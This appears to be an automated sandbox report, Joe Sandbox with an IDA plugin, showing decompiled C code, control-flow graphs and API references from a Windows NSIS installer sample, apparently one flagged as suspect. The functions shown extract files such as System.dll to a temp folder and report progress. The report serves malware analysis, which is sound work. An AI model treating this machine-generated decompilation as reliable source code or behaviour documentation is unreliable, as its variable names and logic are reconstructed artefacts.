                                                  control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 523 4034c8-4034cc 518->523 521 4034aa-4034ad 519->521 522 40346c-40346f 519->522 524 4034c5 520->524 525 403367-40336f 520->525 526 4034b2-4034bb call 4034cf 521->526 527 4034af 521->527 522->524 528 403471 522->528 524->523 529 403371 525->529 530 403374-403382 call 4034cf 525->530 526->516 538 4034c2 526->538 527->526 532 403474-40347a 528->532 529->530 530->516 540 403388-403391 530->540 535 40347c 532->535 536 40347e-40348c call 4034cf 532->536 535->536 536->516 544 40348e-403493 call 4060df 536->544 538->524 542 403397-4033b7 call 406a65 540->542 547 403460-403462 542->547 548 4033bd-4033d0 GetTickCount 542->548 549 403498-40349a 544->549 547->518 552 4033d2-4033da 548->552 553 40341b-40341d 548->553 550 403464-403466 549->550 551 40349c-4034a6 549->551 550->518 551->532 554 4034a8 551->554 555 4033e2-403413 MulDiv wsprintfW call 40559f 552->555 556 4033dc-4033e0 552->556 557 403454-403458 553->557 558 40341f-403423 553->558 554->524 563 403418 555->563 556->553 556->555 557->525 559 40345e 557->559 561 403425-40342c call 4060df 558->561 562 40343a-403445 558->562 559->524 567 403431-403433 561->567 565 403448-40344c 562->565 563->553 565->542 566 403452 565->566 566->524 567->550 568 403435-403438 567->568 568->565
                                                  C-Code - Quality: 95%
                                                  			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                  				signed int _v8;
                                                  				int _v12;
                                                  				intOrPtr _v16;
                                                  				long _v20;
                                                  				intOrPtr _v24;
                                                  				short _v152;
                                                  				void* _t65;
                                                  				void* _t69;
                                                  				long _t70;
                                                  				intOrPtr _t75;
                                                  				long _t76;
                                                  				void* _t78;
                                                  				int _t88;
                                                  				intOrPtr _t92;
                                                  				intOrPtr _t95;
                                                  				long _t96;
                                                  				signed int _t97;
                                                  				int _t98;
                                                  				int _t99;
                                                  				void* _t101;
                                                  				void* _t102;
                                                  
                                                  				_t97 = _a16;
                                                  				_t92 = _a12;
                                                  				_v12 = _t97;
                                                  				if(_t92 == 0) {
                                                  					_v12 = 0x8000;
                                                  				}
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_v16 = _t92;
                                                  				if(_t92 == 0) {
                                                  					_v16 = 0x422a20;
                                                  				}
                                                  				_t62 = _a4;
                                                  				if(_a4 >= 0) {
                                                  					E004034E5( *0x434f58 + _t62);
                                                  				}
                                                  				if(E004034CF( &_a16, 4) == 0) {
                                                  					L41:
                                                  					_push(0xfffffffd);
                                                  					goto L42;
                                                  				} else {
                                                  					if((_a19 & 0x00000080) == 0) {
                                                  						if(_t92 != 0) {
                                                  							if(_a16 < _t97) {
                                                  								_t97 = _a16;
                                                  							}
                                                  							if(E004034CF(_t92, _t97) != 0) {
                                                  								_v8 = _t97;
                                                  								L44:
                                                  								return _v8;
                                                  							} else {
                                                  								goto L41;
                                                  							}
                                                  						}
                                                  						if(_a16 <= _t92) {
                                                  							goto L44;
                                                  						}
                                                  						_t88 = _v12;
                                                  						while(1) {
                                                  							_t98 = _a16;
                                                  							if(_a16 >= _t88) {
                                                  								_t98 = _t88;
                                                  							}
                                                  							if(E004034CF(0x41ea20, _t98) == 0) {
                                                  								goto L41;
                                                  							}
                                                  							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
                                                  							if(_t69 == 0) {
                                                  								L28:
                                                  								_push(0xfffffffe);
                                                  								L42:
                                                  								_pop(_t65);
                                                  								return _t65;
                                                  							}
                                                  							_v8 = _v8 + _t98;
                                                  							_a16 = _a16 - _t98;
                                                  							if(_a16 > 0) {
                                                  								continue;
                                                  							}
                                                  							goto L44;
                                                  						}
                                                  						goto L41;
                                                  					}
                                                  					_t70 = GetTickCount();
                                                  					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                  					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                  					_t14 =  &_a16;
                                                  					 *_t14 = _a16 & 0x7fffffff;
                                                  					_v20 = _t70;
                                                  					 *0x40ce68 = 8;
                                                  					 *0x416a10 = 0x40ea08;
                                                  					 *0x416a0c = 0x40ea08;
                                                  					 *0x416a08 = 0x416a08;
                                                  					_a4 = _a16;
                                                  					if( *_t14 <= 0) {
                                                  						goto L44;
                                                  					} else {
                                                  						goto L9;
                                                  					}
                                                  					while(1) {
                                                  						L9:
                                                  						_t99 = 0x4000;
                                                  						if(_a16 < 0x4000) {
                                                  							_t99 = _a16;
                                                  						}
                                                  						if(E004034CF(0x41ea20, _t99) == 0) {
                                                  							goto L41;
                                                  						}
                                                  						_a16 = _a16 - _t99;
                                                  						 *0x40ce58 = 0x41ea20;
                                                  						 *0x40ce5c = _t99;
                                                  						while(1) {
                                                  							_t95 = _v16;
                                                  							 *0x40ce60 = _t95;
                                                  							 *0x40ce64 = _v12;
                                                  							_t75 = E00406A65(0x40ce58);
                                                  							_v24 = _t75;
                                                  							if(_t75 < 0) {
                                                  								break;
                                                  							}
                                                  							_t101 =  *0x40ce60 - _t95;
                                                  							_t76 = GetTickCount();
                                                  							_t96 = _t76;
                                                  							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                  								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                  								_t102 = _t102 + 0xc;
                                                  								E0040559F(0,  &_v152); // executed
                                                  								_v20 = _t96;
                                                  							}
                                                  							if(_t101 == 0) {
                                                  								if(_a16 > 0) {
                                                  									goto L9;
                                                  								}
                                                  								goto L44;
                                                  							} else {
                                                  								if(_a12 != 0) {
                                                  									_v8 = _v8 + _t101;
                                                  									_v12 = _v12 - _t101;
                                                  									_v16 =  *0x40ce60;
                                                  									L23:
                                                  									if(_v24 != 1) {
                                                  										continue;
                                                  									}
                                                  									goto L44;
                                                  								}
                                                  								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                  								if(_t78 == 0) {
                                                  									goto L28;
                                                  								}
                                                  								_v8 = _v8 + _t101;
                                                  								goto L23;
                                                  							}
                                                  						}
                                                  						_push(0xfffffffc);
                                                  						goto L42;
                                                  					}
                                                  					goto L41;
                                                  				}
                                                  			}
























                                                  0x004032bf
                                                  0x004032c3
                                                  0x004032c6
                                                  0x004032cb
                                                  0x004032cd
                                                  0x004032cd
                                                  0x004032d4
                                                  0x004032d8
                                                  0x004032dd
                                                  0x004032df
                                                  0x004032df
                                                  0x004032e6
                                                  0x004032eb
                                                  0x004032f6
                                                  0x004032f6
                                                  0x00403308
                                                  0x004034bd
                                                  0x004034bd
                                                  0x00000000
                                                  0x0040330e
                                                  0x00403312
                                                  0x0040346a
                                                  0x004034ad
                                                  0x004034af
                                                  0x004034af
                                                  0x004034bb
                                                  0x004034c2
                                                  0x004034c5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004034bb
                                                  0x0040346f
                                                  0x00000000
                                                  0x00000000
                                                  0x00403471
                                                  0x00403474
                                                  0x00403477
                                                  0x0040347a
                                                  0x0040347c
                                                  0x0040347c
                                                  0x0040348c
                                                  0x00000000
                                                  0x00000000
                                                  0x00403493
                                                  0x0040349a
                                                  0x00403464
                                                  0x00403464
                                                  0x004034bf
                                                  0x004034bf
                                                  0x00000000
                                                  0x004034bf
                                                  0x0040349c
                                                  0x0040349f
                                                  0x004034a6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004034a8
                                                  0x00000000
                                                  0x00403474
                                                  0x0040331e
                                                  0x00403320
                                                  0x00403327
                                                  0x0040332e
                                                  0x0040332e
                                                  0x00403335
                                                  0x0040333d
                                                  0x00403347
                                                  0x0040334c
                                                  0x00403354
                                                  0x0040335e
                                                  0x00403361
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403367
                                                  0x00403367
                                                  0x00403367
                                                  0x0040336f
                                                  0x00403371
                                                  0x00403371
                                                  0x00403382
                                                  0x00000000
                                                  0x00000000
                                                  0x00403388
                                                  0x0040338b
                                                  0x00403391
                                                  0x00403397
                                                  0x00403397
                                                  0x004033a2
                                                  0x004033a8
                                                  0x004033ad
                                                  0x004033b4
                                                  0x004033b7
                                                  0x00000000
                                                  0x00000000
                                                  0x004033c3
                                                  0x004033c5
                                                  0x004033ce
                                                  0x004033d0
                                                  0x00403401
                                                  0x00403407
                                                  0x00403413
                                                  0x00403418
                                                  0x00403418
                                                  0x0040341d
                                                  0x00403458
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040341f
                                                  0x00403423
                                                  0x0040343f
                                                  0x00403442
                                                  0x00403445
                                                  0x00403448
                                                  0x0040344c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403452
                                                  0x0040342c
                                                  0x00403433
                                                  0x00000000
                                                  0x00000000
                                                  0x00403435
                                                  0x00000000
                                                  0x00403435
                                                  0x0040341d
                                                  0x00403460
                                                  0x00000000
                                                  0x00403460
                                                  0x00000000
                                                  0x00403367

                                                  APIs
                                                  Strings
                                                  • A, xrefs: 0040347E
                                                  • ... %d%%, xrefs: 004033FB
                                                  • <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <path d="m 4 1 c -1.660156 0 -3 1.339844 -3 3 v 8 c 0 1.660156 1.339844 3 3 3 h 8 c 1.660156 0 3 -1.339844 3 -3 v -8 c 0 -1.66015, xrefs: 00403338
                                                  • A, xrefs: 00403374
                                                  • *B, xrefs: 004032DF
                                                  • }8@, xrefs: 004032B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: *B$ A$ A$... %d%%$<?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <path d="m 4 1 c -1.660156 0 -3 1.339844 -3 3 v 8 c 0 1.660156 1.339844 3 3 3 h 8 c 1.660156 0 3 -1.339844 3 -3 v -8 c 0 -1.66015$}8@
                                                  • API String ID: 551687249-2487974866
                                                  • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                  • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                  • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                  • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 581 4017b5-4017b6 call 4067c4 574->581 575->581 584 4017bb-4017bf 581->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 594 4017dd-4017ef 585->594 595 4017cd-4017db CompareFileTime 585->595 588 4017f7-4017f8 call 406008 586->588 589 4017fd-401819 call 40602d 586->589 588->589 596 40181b-40181e 589->596 597 40188d-4018b6 call 40559f call 4032b4 589->597 594->586 595->594 598 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->598 599 40186f-401879 call 40559f 596->599 611 4018b8-4018bc 597->611 612 4018be-4018ca SetFileTime 597->612 598->584 633 401864-401865 598->633 609 401882-401888 599->609 613 402c33 609->613 611->612 615 4018d0-4018db CloseHandle 611->615 612->615 619 402c35-402c39 613->619 617 4018e1-4018e4 615->617 618 402c2a-402c2d 615->618 621 4018e6-4018f7 call 40657a lstrcatW 617->621 622 4018f9-4018fc call 40657a 617->622 618->613 627 401901-402398 621->627 622->627 631 40239d-4023a2 627->631 632 402398 call 405b9d 627->632 631->619 632->631 633->609 634 401867-401868 633->634 634->599
                                                  C-Code - Quality: 75%
                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                  				void* __esi;
                                                  				void* _t35;
                                                  				void* _t43;
                                                  				void* _t45;
                                                  				FILETIME* _t51;
                                                  				FILETIME* _t64;
                                                  				void* _t66;
                                                  				signed int _t72;
                                                  				FILETIME* _t73;
                                                  				FILETIME* _t77;
                                                  				signed int _t79;
                                                  				WCHAR* _t81;
                                                  				void* _t83;
                                                  				void* _t84;
                                                  				void* _t86;
                                                  
                                                  				_t77 = __ebx;
                                                  				 *(_t86 - 8) = E00402DA6(0x31);
                                                  				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                  				_t35 = E00405E83( *(_t86 - 8));
                                                  				_push( *(_t86 - 8));
                                                  				_t81 = L"Call";
                                                  				if(_t35 == 0) {
                                                  					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
                                                  				} else {
                                                  					E0040653D();
                                                  				}
                                                  				E004067C4(_t81);
                                                  				while(1) {
                                                  					__eflags =  *(_t86 + 8) - 3;
                                                  					if( *(_t86 + 8) >= 3) {
                                                  						_t66 = E00406873(_t81);
                                                  						_t79 = 0;
                                                  						__eflags = _t66 - _t77;
                                                  						if(_t66 != _t77) {
                                                  							_t73 = _t66 + 0x14;
                                                  							__eflags = _t73;
                                                  							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                  						}
                                                  						asm("sbb eax, eax");
                                                  						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                  						__eflags = _t72;
                                                  						 *(_t86 + 8) = _t72;
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                  					if( *(_t86 + 8) == _t77) {
                                                  						E00406008(_t81);
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - 1;
                                                  					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                  					__eflags = _t43 - 0xffffffff;
                                                  					 *(_t86 - 0x38) = _t43;
                                                  					if(_t43 != 0xffffffff) {
                                                  						break;
                                                  					}
                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                  					if( *(_t86 + 8) != _t77) {
                                                  						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                  						__eflags =  *(_t86 + 8) - 2;
                                                  						if(__eflags == 0) {
                                                  							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                  						}
                                                  						L31:
                                                  						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                  						__eflags =  *0x434f88;
                                                  						goto L32;
                                                  					} else {
                                                  						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nsy8A61.tmp", _t83);
                                                  						E0040653D(_t83, _t81);
                                                  						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsy8A61.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                  						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsy8A61.tmp");
                                                  						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nsy8A61.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                  						__eflags = _t64;
                                                  						if(_t64 == 0) {
                                                  							continue;
                                                  						} else {
                                                  							__eflags = _t64 == 1;
                                                  							if(_t64 == 1) {
                                                  								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                  								L32:
                                                  								_t51 = 0;
                                                  								__eflags = 0;
                                                  							} else {
                                                  								_push(_t81);
                                                  								_push(0xfffffffa);
                                                  								E0040559F();
                                                  								L29:
                                                  								_t51 = 0x7fffffff;
                                                  							}
                                                  						}
                                                  					}
                                                  					L33:
                                                  					return _t51;
                                                  				}
                                                  				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                  				 *0x434fb4 =  *0x434fb4 + 1;
                                                  				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                  				 *0x434fb4 =  *0x434fb4 - 1;
                                                  				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                  				_t84 = _t45;
                                                  				if( *(_t86 - 0x24) != 0xffffffff) {
                                                  					L22:
                                                  					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                  				} else {
                                                  					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                  					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                  						goto L22;
                                                  					}
                                                  				}
                                                  				CloseHandle( *(_t86 - 0x38)); // executed
                                                  				__eflags = _t84 - _t77;
                                                  				if(_t84 >= _t77) {
                                                  					goto L31;
                                                  				} else {
                                                  					__eflags = _t84 - 0xfffffffe;
                                                  					if(_t84 != 0xfffffffe) {
                                                  						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                  					} else {
                                                  						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                  						lstrcatW(_t81,  *(_t86 - 8));
                                                  					}
                                                  					_push(0x200010);
                                                  					_push(_t81);
                                                  					E00405B9D();
                                                  					goto L29;
                                                  				}
                                                  				goto L33;
                                                  			}


















                                                  0x0040176f
                                                  0x00401776
                                                  0x00401782
                                                  0x00401785
                                                  0x0040178a
                                                  0x0040178d
                                                  0x00401794
                                                  0x004017b0
                                                  0x00401796
                                                  0x00401797
                                                  0x00401797
                                                  0x004017b6
                                                  0x004017bb
                                                  0x004017bb
                                                  0x004017bf
                                                  0x004017c2
                                                  0x004017c7
                                                  0x004017c9
                                                  0x004017cb
                                                  0x004017d0
                                                  0x004017d0
                                                  0x004017db
                                                  0x004017db
                                                  0x004017ec
                                                  0x004017ee
                                                  0x004017ee
                                                  0x004017ef
                                                  0x004017ef
                                                  0x004017f2
                                                  0x004017f5
                                                  0x004017f8
                                                  0x004017f8
                                                  0x004017ff
                                                  0x0040180e
                                                  0x00401813
                                                  0x00401816
                                                  0x00401819
                                                  0x00000000
                                                  0x00000000
                                                  0x0040181b
                                                  0x0040181e
                                                  0x00401874
                                                  0x00401879
                                                  0x004015b6
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00402c2a
                                                  0x00402c2d
                                                  0x00402c2d
                                                  0x00000000
                                                  0x00401820
                                                  0x00401826
                                                  0x0040182d
                                                  0x0040183a
                                                  0x00401845
                                                  0x0040185b
                                                  0x0040185b
                                                  0x0040185e
                                                  0x00000000
                                                  0x00401864
                                                  0x00401864
                                                  0x00401865
                                                  0x00401882
                                                  0x00402c33
                                                  0x00402c33
                                                  0x00402c33
                                                  0x00401867
                                                  0x00401867
                                                  0x00401868
                                                  0x00401493
                                                  0x0040239d
                                                  0x0040239d
                                                  0x0040239d
                                                  0x00401865
                                                  0x0040185e
                                                  0x00402c35
                                                  0x00402c39
                                                  0x00402c39
                                                  0x00401892
                                                  0x00401897
                                                  0x004018a5
                                                  0x004018aa
                                                  0x004018b0
                                                  0x004018b4
                                                  0x004018b6
                                                  0x004018be
                                                  0x004018ca
                                                  0x004018b8
                                                  0x004018b8
                                                  0x004018bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004018bc
                                                  0x004018d3
                                                  0x004018d9
                                                  0x004018db
                                                  0x00000000
                                                  0x004018e1
                                                  0x004018e1
                                                  0x004018e4
                                                  0x004018fc
                                                  0x004018e6
                                                  0x004018e9
                                                  0x004018f2
                                                  0x004018f2
                                                  0x00401901
                                                  0x00401906
                                                  0x00402398
                                                  0x00000000
                                                  0x00402398
                                                  0x00000000

                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,?,755323A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,?,755323A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00403418), ref: 004055FA
                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll), ref: 0040560C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsy8A61.tmp$C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll$Call
                                                  • API String ID: 1941528284-1508778430
                                                  • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                  • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                  • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                  • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 643 4055f6-4055fa lstrcatW 641->643 644 405612-405616 642->644 645 405605-40560c SetWindowTextW 642->645 643->642 646 405618-40565a SendMessageW * 3 644->646 647 40565c-40565e 644->647 645->644 646->647 647->637 648 405660-405663 647->648 648->637
                                                  C-Code - Quality: 100%
                                                  			E0040559F(signed int _a4, WCHAR* _a8) {
                                                  				struct HWND__* _v8;
                                                  				signed int _v12;
                                                  				WCHAR* _v32;
                                                  				long _v44;
                                                  				int _v48;
                                                  				void* _v52;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				WCHAR* _t27;
                                                  				signed int _t28;
                                                  				long _t29;
                                                  				signed int _t37;
                                                  				signed int _t38;
                                                  
                                                  				_t27 =  *0x433ee4; // 0x14004c
                                                  				_v8 = _t27;
                                                  				if(_t27 != 0) {
                                                  					_t37 =  *0x434fb4;
                                                  					_v12 = _t37;
                                                  					_t38 = _t37 & 0x00000001;
                                                  					if(_t38 == 0) {
                                                  						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                                  					}
                                                  					_t27 = lstrlenW(0x42c248);
                                                  					_a4 = _t27;
                                                  					if(_a8 == 0) {
                                                  						L6:
                                                  						if((_v12 & 0x00000004) == 0) {
                                                  							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                                  						}
                                                  						if((_v12 & 0x00000002) == 0) {
                                                  							_v32 = 0x42c248;
                                                  							_v52 = 1;
                                                  							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                  							_v44 = 0;
                                                  							_v48 = _t29 - _t38;
                                                  							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                  							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                  						}
                                                  						if(_t38 != 0) {
                                                  							_t28 = _a4;
                                                  							0x42c248[_t28] = 0;
                                                  							return _t28;
                                                  						}
                                                  					} else {
                                                  						_t27 = lstrlenW(_a8) + _a4;
                                                  						if(_t27 < 0x1000) {
                                                  							_t27 = lstrcatW(0x42c248, _a8);
                                                  							goto L6;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t27;
                                                  			}

















                                                  0x004055a5
                                                  0x004055af
                                                  0x004055b4
                                                  0x004055ba
                                                  0x004055c5
                                                  0x004055c8
                                                  0x004055cb
                                                  0x004055d1
                                                  0x004055d1
                                                  0x004055d7
                                                  0x004055df
                                                  0x004055e2
                                                  0x004055ff
                                                  0x00405603
                                                  0x0040560c
                                                  0x0040560c
                                                  0x00405616
                                                  0x0040561f
                                                  0x0040562b
                                                  0x00405632
                                                  0x00405636
                                                  0x00405639
                                                  0x0040564c
                                                  0x0040565a
                                                  0x0040565a
                                                  0x0040565e
                                                  0x00405660
                                                  0x00405663
                                                  0x00000000
                                                  0x00405663
                                                  0x004055e4
                                                  0x004055ec
                                                  0x004055f4
                                                  0x004055fa
                                                  0x00000000
                                                  0x004055fa
                                                  0x004055f4
                                                  0x004055e2
                                                  0x0040566f

                                                  APIs
                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,?,755323A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,?,755323A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00403418), ref: 004055FA
                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll), ref: 0040560C
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000), ref: 00406779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
